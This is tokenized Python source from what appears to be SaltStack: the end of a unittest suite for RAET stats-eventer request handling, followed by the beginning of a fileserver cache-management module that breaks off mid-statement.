"""<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterRoadStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { '<STR_LIT>' : { '<STR_LIT:src>' : [ None , '<STR_LIT>' , None ] , <EOL> '<STR_LIT>' : [ None , None , '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : { '<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> def testMasterLaneStats ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterLaneStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { '<STR_LIT>' : { '<STR_LIT:src>' : [ None , '<STR_LIT>' , None ] , <EOL> '<STR_LIT>' : [ None , None , '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : { '<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMasterStatsWrongMissingTag ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterStatsWrongMissingTag . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = '<STR_LIT>' <EOL> self . assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMasterStatsUnknownRemote ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterStatsUnknownRemote . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> unknownName = '<STR_LIT>' <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , unknownName , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMasterStatsNoRequest ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterStatsNoRequest . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> self . assertEqual ( len ( statsReq ) , <NUM_LIT:0> ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionContextSetup ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionContextSetup . __doc__ ) ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . reacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> self . assertDictEqual ( act . actor . Ioinits , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertIsInstance ( act . actor . lane_stack . value , LaneStack ) <EOL> self . assertIsInstance ( act . actor . road_stack . value , RoadStack ) <EOL> self . frame . recur ( ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> def testMinionRoadStats ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionRoadStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> minionName = roadStack . value . local . name <EOL> masterName = testStack . local . name <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { u'<STR_LIT>' : { u'<STR_LIT:src>' : [ ns2u ( minionName ) , u'<STR_LIT>' , None ] , <EOL> u'<STR_LIT>' : [ ns2u ( masterName ) , None , u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ns2u ( tag ) , <EOL> u'<STR_LIT:data>' : { u'<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionLaneStats ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionLaneStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> minionName = roadStack . value . local . name <EOL> masterName = testStack . local . name <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { u'<STR_LIT>' : { u'<STR_LIT:src>' : [ ns2u ( minionName ) , u'<STR_LIT>' , None ] , <EOL> u'<STR_LIT>' : [ ns2u ( masterName ) , None , u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ns2u ( tag ) , <EOL> u'<STR_LIT:data>' : { u'<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionStatsWrongMissingTag ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionStatsWrongMissingTag . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = '<STR_LIT>' <EOL> self . assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> minionName = roadStack . value . local . name <EOL> masterName = testStack . local . name <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionStatsUnknownRemote ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionStatsUnknownRemote . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> minionName = roadStack . value . local . name <EOL> unknownName = '<STR_LIT>' <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( unknownName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionStatsNoRequest ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionStatsNoRequest . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> self . assertEqual ( len ( statsReq ) , <NUM_LIT:0> ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def runOne ( test ) : <EOL> '''<STR_LIT>''' <EOL> test = StatsEventerTestCase ( test ) <EOL> suite = unittest . TestSuite ( [ test ] ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) <EOL> def runSome ( ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ] <EOL> names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> tests . extend ( map ( StatsEventerTestCase , names ) ) <EOL> suite = unittest . TestSuite ( tests ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) <EOL> def runAll ( ) : <EOL> """<STR_LIT>""" <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . TestLoader ( ) . loadTestsFromTestCase ( StatsEventerTestCase ) ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) <EOL> if __name__ == '<STR_LIT:__main__>' and __package__ is None : <EOL> runSome ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import errno <EOL> import fnmatch <EOL> import logging <EOL> import os <EOL> import re <EOL> import time <EOL> import salt . loader <EOL> import salt . utils <EOL> import salt . utils . locales <EOL> import salt . ext . six as six <EOL> log = logging . getLogger ( __name__ ) <EOL> def _unlock_cache ( w_lock ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . exists ( w_lock ) : <EOL> return <EOL> try : <EOL> if os . path . isdir ( w_lock ) : <EOL> os . rmdir ( w_lock ) <EOL> elif os . path . isfile ( w_lock ) : <EOL> os . unlink ( w_lock ) <EOL> except ( OSError , IOError ) as exc : <EOL> log . trace ( '<STR_LIT>' . format ( w_lock , exc ) ) <EOL> def _lock_cache ( w_lock ) : <EOL> try : <EOL> os . mkdir ( w_lock ) <EOL> except OSError as exc : <EOL> if exc . errno != errno . EEXIST : <EOL> raise <EOL> return False <EOL> else : <EOL> log . trace ( '<STR_LIT>' . format ( w_lock ) ) <EOL> return True <EOL> def wait_lock ( lk_fn , dest , wait_timeout = <NUM_LIT:0> ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . exists ( lk_fn ) : <EOL> return False <EOL> if not os . path . exists ( dest ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if not os . path . isfile ( dest ) : <EOL> _unlock_cache ( lk_fn ) <EOL> return False <EOL> timeout = None <EOL> if wait_timeout : <EOL> timeout = time . time ( ) + wait_timeout <EOL> s_count = <NUM_LIT:0> <EOL> s_size = os . stat ( dest ) . st_size <EOL> while True : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if not os . path . exists ( lk_fn ) : <EOL> return False <EOL> size = os . stat ( dest ) . st_size <EOL> if size == s_size : <EOL> s_count += <NUM_LIT:1> <EOL> if s_count >= <NUM_LIT:3> : <EOL> _unlock_cache ( lk_fn ) <EOL> return False <EOL> else : <EOL> s_size = size <EOL> if timeout : <EOL> if time . time ( ) > timeout : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> wait_timeout , dest , lk_fn ) ) <EOL> return False <EOL> def check_file_list_cache ( opts , form , list_cache , w_lock ) : <EOL> '''<STR_LIT>''' <EOL> refresh_cache = False <EOL> save_cache = True <EOL> serial = salt . payload . Serial ( opts ) <EOL> wait_lock ( w_lock , list_cache , <NUM_LIT:5> * <NUM_LIT> ) <EOL> if not os . path . isfile ( list_cache ) and _lock_cache ( w_lock ) : <EOL> refresh_cache = True <EOL> else : <EOL> attempt = <NUM_LIT:0> <EOL> while attempt < <NUM_LIT:11> : <EOL> try : <EOL> if os . path . exists ( w_lock ) : <EOL> wait_lock ( w_lock , list_cache , <NUM_LIT:15> * <NUM_LIT> ) <EOL> if os . path . exists ( list_cache ) : <EOL> cache_stat = os . stat ( list_cache ) <EOL> age = time . time ( ) - cache_stat . st_mtime <EOL> else : <EOL> age = opts . get ( '<STR_LIT>' , <NUM_LIT:30> ) + <NUM_LIT:1> <EOL> if age < opts . get ( '<STR_LIT>' , <NUM_LIT:30> ) : <EOL> with salt . utils . fopen ( list_cache , '<STR_LIT:rb>' ) as fp_ : <EOL> log . trace ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( list_cache ) ) <EOL> return serial . load ( fp_ ) . get ( form , [ ] ) , False , False <EOL> elif _lock_cache ( w_lock ) : <EOL> refresh_cache = True <EOL> break <EOL> except Exception : <EOL> time . sleep ( <NUM_LIT> ) <EOL> attempt += <NUM_LIT:1> <EOL> continue <EOL> if attempt > <NUM_LIT:10> : <EOL> save_cache = False <EOL> refresh_cache = True <EOL> return None , refresh_cache , save_cache <EOL> def write_file_list_cache ( opts , data , list_cache , w_lock ) : <EOL> '''<STR_LIT>''' <EOL> serial = salt . payload . Serial ( opts ) <EOL> with salt . utils . fopen ( list_cache , '<STR_LIT>' ) as fp_ : <EOL> fp_ . write ( serial . dumps ( data ) ) <EOL> _unlock_cache ( w_lock ) <EOL> log . trace ( '<STR_LIT>' . format ( w_lock ) ) <EOL> def check_env_cache ( opts , env_cache ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . isfile ( env_cache ) : <EOL> return None <EOL> try : <EOL> with salt . utils . fopen ( env_cache , '<STR_LIT:rb>' ) as fp_ : <EOL> log . trace ( '<STR_LIT>' . format ( env_cache ) ) <EOL> serial = salt . payload . Serial ( opts ) <EOL> return serial . load ( fp_ ) <EOL> except ( IOError , OSError ) : <EOL> pass <EOL> return None <EOL> def generate_mtime_map ( path_map ) : <EOL> '''<STR_LIT>''' <EOL> file_map = { } <EOL> for saltenv , path_list in six . iteritems ( path_map ) : <EOL> for path in path_list : <EOL> for directory , dirnames , filenames in os . walk ( path ) : <EOL> for item in filenames : <EOL> try : <EOL> file_path = os . path . join ( directory , item ) <EOL> file_map [ file_path ] = os . path . getmtime ( file_path ) <EOL> except ( OSError , IOError ) : <EOL> log . info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( file_path ) ) <EOL> continue <EOL> return file_map <EOL> def diff_mtime_map ( map1 , map2 ) : <EOL> '''<STR_LIT>''' <EOL> if sorted ( map1 ) != sorted ( map2 ) : <EOL> return True <EOL> return False <EOL> def reap_fileserver_cache_dir ( cache_base , find_func ) : <EOL> '''<STR_LIT>''' <EOL> for saltenv in os . listdir ( cache_base ) : <EOL> env_base = os . path . join ( cache_base , saltenv ) <EOL> for root , dirs , files in os . walk ( env_base ) : <EOL> if len ( dirs ) == <NUM_LIT:0> and len ( files ) == <NUM_LIT:0> : <EOL> if time . time ( ) - os . path . getctime ( root ) > <NUM_LIT> : <EOL> os . rmdir ( root ) <EOL> continue <EOL> for file_ in files : <EOL> file_path = os . path . join ( root , file_ ) <EOL> file_rel_path = os . path . relpath ( file_path , env_base ) <EOL> try : <EOL> filename , _ , hash_type = file_rel_path 